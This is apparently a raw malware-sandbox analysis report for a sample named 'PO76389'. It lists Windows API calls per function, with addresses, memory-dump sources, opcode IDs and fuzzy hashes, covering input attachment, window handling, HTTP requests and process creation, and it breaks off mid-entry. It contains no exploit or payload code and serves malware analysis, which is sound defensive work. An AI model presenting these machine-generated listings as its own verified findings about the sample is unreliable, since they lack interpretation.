                                                    • __calloc_crt.LIBCMT ref: 004DBA85
                                                      • Part of subcall function 004D7616: __calloc_impl.LIBCMT ref: 004D7625
                                                      • Part of subcall function 004D7616: Sleep.KERNEL32(00000000,?,004D0127,?,004B125D,00000058,?,?), ref: 004D763C
                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 004DBAA0
                                                    • GetStartupInfoW.KERNEL32(?,00566990,00000064,004D6B14,005667D8,00000014), ref: 004DBAF9
                                                    • __calloc_crt.LIBCMT ref: 004DBB44
                                                    • GetFileType.KERNEL32(00000001), ref: 004DBB8B
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 004DBBC4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 1426640281-0
                                                    • Opcode ID: e07ebc8dc6fc4b3733227a0cc1ccad30b88eef3a44162bf4684578cd1d7ca9e5
                                                    • Instruction ID: a44fd74af1349cee43199316589ab66ddf802750579745519281aa80ecb535c0
                                                    • Opcode Fuzzy Hash: e07ebc8dc6fc4b3733227a0cc1ccad30b88eef3a44162bf4684578cd1d7ca9e5
                                                    • Instruction Fuzzy Hash: 4A81E170904305CFCB20CF68D8606AABBF0FB19724B24425FD4A6AB3D1C7389843DB99
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 004F4A7D
                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4A91
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 004F4A98
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4AA7
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 004F4AB9
                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4AD2
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4AE4
                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4B29
                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4B3E
                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4B49
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                    • String ID:
                                                    • API String ID: 2156557900-0
                                                    • Opcode ID: a7ccf54273b95c7dec131c3a2ce62714609035bd08b430cced3abde060099737
                                                    • Instruction ID: c95591f01db98676c533d18cd764f11934ad7000baa8604abed98d45d52a0733
                                                    • Opcode Fuzzy Hash: a7ccf54273b95c7dec131c3a2ce62714609035bd08b430cced3abde060099737
                                                    • Instruction Fuzzy Hash: 27318671510208ABDB109F54EC85B7B777DABA0321F144006FB05D7360DBB8ED88BB65
                                                    APIs
                                                    • GetClientRect.USER32(?), ref: 0052EC32
                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0052EC49
                                                    • GetWindowDC.USER32(?), ref: 0052EC55
                                                    • GetPixel.GDI32(00000000,?,?), ref: 0052EC64
                                                    • ReleaseDC.USER32(?,00000000), ref: 0052EC76
                                                    • GetSysColor.USER32(00000005), ref: 0052EC94
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                    • String ID:
                                                    • API String ID: 272304278-0
                                                    • Opcode ID: a4dcb27ad6934269a9aab284289d72bb8d453bec713e7eb479178664e8435393
                                                    • Instruction ID: 8d51493b739c068758ab3b43c55b6ea8d897eb510573e06dc3247bff80d946fc
                                                    • Opcode Fuzzy Hash: a4dcb27ad6934269a9aab284289d72bb8d453bec713e7eb479178664e8435393
                                                    • Instruction Fuzzy Hash: 8D215C31500204AFDB61ABB4FC4AFAA7B75FB15321F104225FA26A52E1CB310959EF21
                                                    APIs
                                                    • EnumChildWindows.USER32(?,004EDD46), ref: 004EDC86
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ChildEnumWindows
                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                    • API String ID: 3555792229-1603158881
                                                    • Opcode ID: 86ec5af36138f8792088f0ada940664bfc7e49080878bade63d60e39a4c99051
                                                    • Instruction ID: f9c3f43dda08b18c0baeefa39467f65c19fc5c36e19d9d25b033bcd47158152f
                                                    • Opcode Fuzzy Hash: 86ec5af36138f8792088f0ada940664bfc7e49080878bade63d60e39a4c99051
                                                    • Instruction Fuzzy Hash: 4D91E730E005469ACB08DF62C481BEAFBB5FF14344F54811FD84AA7291DF78694ADBA8
                                                    APIs
                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004B45F0
                                                    • CoUninitialize.COMBASE ref: 004B4695
                                                    • UnregisterHotKey.USER32(?), ref: 004B47BD
                                                    • DestroyWindow.USER32(?), ref: 00525936
                                                    • FreeLibrary.KERNEL32(?), ref: 0052599D
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 005259CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                    • String ID: close all
                                                    • API String ID: 469580280-3243417748
                                                    • Opcode ID: 34f93a55f02a61d685bfc71ed36ee55256eebcdf4c4a6c1064c034be35abb830
                                                    • Instruction ID: 2cc9d06b9744403f3f5a6cf5c3e1b87b778d6ca98ccbc569fffbc1c2db5a62d9
                                                    • Opcode Fuzzy Hash: 34f93a55f02a61d685bfc71ed36ee55256eebcdf4c4a6c1064c034be35abb830
                                                    • Instruction Fuzzy Hash: F2915034600502CFC715EF15D995BA9F7B4FF15704F1042AEE40A572A2DB38AE56DF28
                                                    APIs
                                                    • SetWindowLongW.USER32(?,000000EB), ref: 004CC2D2
                                                      • Part of subcall function 004CC697: GetClientRect.USER32(?,?), ref: 004CC6C0
                                                      • Part of subcall function 004CC697: GetWindowRect.USER32(?,?), ref: 004CC701
                                                      • Part of subcall function 004CC697: ScreenToClient.USER32(?,?), ref: 004CC729
                                                    • GetDC.USER32 ref: 0052E006
                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0052E019
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0052E027
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0052E03C
                                                    • ReleaseDC.USER32(?,00000000), ref: 0052E044
                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0052E0CF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                    • String ID: U
                                                    • API String ID: 4009187628-3372436214
                                                    • Opcode ID: 710593551498f0e87efc7263a55e1cf3ca2254c950c6fec0b52d6997b7be0a3c
                                                    • Instruction ID: 3165d0094ba9449658545ced893d91afc25b77eaf20b33feeda247b9ac305270
                                                    • Opcode Fuzzy Hash: 710593551498f0e87efc7263a55e1cf3ca2254c950c6fec0b52d6997b7be0a3c
                                                    • Instruction Fuzzy Hash: D2710435900208DFCF21CF64E889AEA7FB5FF5A310F14426AED595A2E5C7318C42EB65
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00504C5E
                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00504C8A
                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00504CCC
                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00504CE1
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00504CEE
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00504D1E
                                                    • InternetCloseHandle.WININET(00000000), ref: 00504D65
                                                      • Part of subcall function 005056A9: GetLastError.KERNEL32(?,?,00504A2B,00000000,00000000,00000001), ref: 005056BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                    • String ID:
                                                    • API String ID: 1241431887-3916222277
                                                    • Opcode ID: 96617d934b5a76efa6363a4d62ba7228faac34eb7c73931d629bd851c866b714
                                                    • Instruction ID: cd456a6d29502bfeca12e4c47583f02712e3c9e25360fafe0e85f1c624227d45
                                                    • Opcode Fuzzy Hash: 96617d934b5a76efa6363a4d62ba7228faac34eb7c73931d629bd851c866b714
                                                    • Instruction Fuzzy Hash: 6B414AB2501619BFEB129F60DD89FBF7BACFB48354F10411AFA019A291E7709D449BA0
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0054DBF0), ref: 0050BBA1
                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0054DBF0), ref: 0050BBD5
                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0050BD33
                                                    • SysFreeString.OLEAUT32(?), ref: 0050BD5D
                                                    • StringFromGUID2.COMBASE(?,?,00000028), ref: 0050BEAD
                                                    • ProgIDFromCLSID.COMBASE(?,?), ref: 0050BEF7
                                                    • CoTaskMemFree.COMBASE(?), ref: 0050BF14
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                    • String ID:
                                                    • API String ID: 793797124-0
                                                    • Opcode ID: f461a9240f4d321e76b7ba47d9ae7c8dd7759e9e4eea1dab05625c658a0da2ff
                                                    • Instruction ID: ec8af44cef09646718aa249e90420fb4690d9c5e92f184c09d649be6ab9121e9
                                                    • Opcode Fuzzy Hash: f461a9240f4d321e76b7ba47d9ae7c8dd7759e9e4eea1dab05625c658a0da2ff
                                                    • Instruction Fuzzy Hash: D8F10A75A00109EFDF14DFA4C884EAEBBB9FF89314F148459F905AB290DB71AE45CB60
                                                    APIs
                                                    • _memset.LIBCMT ref: 005123E6
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00512579
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0051259D
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005125DD
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005125FF
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00512760
                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00512792
                                                    • CloseHandle.KERNEL32(?), ref: 005127C1
                                                    • CloseHandle.KERNEL32(?), ref: 00512838
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                    • String ID:
                                                    • API String ID: 4090791747-0
                                                    • Opcode ID: 879d1ba8f162d7af08ddc69089b72631cbdddf7cdf7ca8fdb7d5fdf6f095cb97
                                                    • Instruction ID: 8c318a87831f32e1d325cadeda7246de76d82e9010003c3b1d1d8f93e7715047
                                                    • Opcode Fuzzy Hash: 879d1ba8f162d7af08ddc69089b72631cbdddf7cdf7ca8fdb7d5fdf6f095cb97
                                                    • Instruction Fuzzy Hash: 66D1C0316043019FDB14EF25C891BAABBE5BF84314F14845EF8899B3A2DB74DC81CB66
                                                    APIs
                                                      • Part of subcall function 004B49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004B4954,00000000), ref: 004B4A23
                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,004CB85B), ref: 004CB926
                                                    • KillTimer.USER32(00000000,?,00000000,?,?,?,?,004CB85B,00000000,?,?,004CAF1E,?,?), ref: 004CB9BD
                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 0052E775
                                                    • DeleteObject.GDI32(00000000), ref: 0052E7EB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                    • String ID:
                                                    • API String ID: 2402799130-0
                                                    • Opcode ID: 2806a548d177e263b41412a93895b7c1a89c6533f3120f1de2d456711f07c627
                                                    • Instruction ID: d4bc06c2d4a2a3d0343bac10733a35e481fb55506950eedb204b6823dfe9ab72
                                                    • Opcode Fuzzy Hash: 2806a548d177e263b41412a93895b7c1a89c6533f3120f1de2d456711f07c627
                                                    • Instruction Fuzzy Hash: 4C61E134100B11CFDB259F19E88AB26BBF1FF65311F14011EE19A466B0C734A885EF9A
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0051B204
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: 6b9b93a03c4321cdd9657ab9b2e4dae3baa56b0ef6eabc1bc42f9506efa901ca
                                                    • Instruction ID: 2d77ae3dbfdecebd70d191f548a5fa879f5dd9d46963d108a75b6b536ef898d7
                                                    • Opcode Fuzzy Hash: 6b9b93a03c4321cdd9657ab9b2e4dae3baa56b0ef6eabc1bc42f9506efa901ca
                                                    • Instruction Fuzzy Hash: 5F51AD34640204BEFF209B28CC8AFDE3F65BB16314F204916FA65D61A1C7B1E9D4EB51
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0052E9EA
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0052EA0B
                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0052EA20
                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0052EA3D
                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0052EA64
                                                    • DestroyCursor.USER32(00000000), ref: 0052EA6F
                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0052EA8C
                                                    • DestroyCursor.USER32(00000000), ref: 0052EA97
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                    • String ID:
                                                    • API String ID: 3992029641-0
                                                    • Opcode ID: 141a72414de109426006647f36afd8d508a2881d5a4eea3eebd2860b0df124b1
                                                    • Instruction ID: 31a6346ee46e48a8bf7c8d901fc91673a603b145577123c2c52dcd3ba96c3ac3
                                                    • Opcode Fuzzy Hash: 141a72414de109426006647f36afd8d508a2881d5a4eea3eebd2860b0df124b1
                                                    • Instruction Fuzzy Hash: AE519A74600208AFDB20CF69DC86FAA3BB4BF19358F10461EF946972D0D774EC91AB55
                                                    APIs
                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0052E9A0,00000004,00000000,00000000), ref: 004CF737
                                                    • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0052E9A0,00000004,00000000,00000000), ref: 004CF77E
                                                    • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0052E9A0,00000004,00000000,00000000), ref: 0052EB55
                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0052E9A0,00000004,00000000,00000000), ref: 0052EBC1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ShowWindow
                                                    • String ID:
                                                    • API String ID: 1268545403-0
                                                    • Opcode ID: ad5c1fba246ae7535c57a86e499f63658640494596edf331735bc660de6d74fe
                                                    • Instruction ID: 0053a3d6423d11c5b373c07e2ab99a8091c77f5b8a4809b6b65df31421f90174
                                                    • Opcode Fuzzy Hash: ad5c1fba246ae7535c57a86e499f63658640494596edf331735bc660de6d74fe
                                                    • Instruction Fuzzy Hash: 7F414E382056809ADBB44738ACC9F677EA77F56301F25082FF05B426A1C67CB84DD72A
                                                    APIs
                                                      • Part of subcall function 004EE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 004EE158
                                                      • Part of subcall function 004EE138: GetCurrentThreadId.KERNEL32 ref: 004EE15F
                                                      • Part of subcall function 004EE138: AttachThreadInput.USER32(00000000,?,004ECDFB,?,00000001), ref: 004EE166
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 004ECE06
                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004ECE23
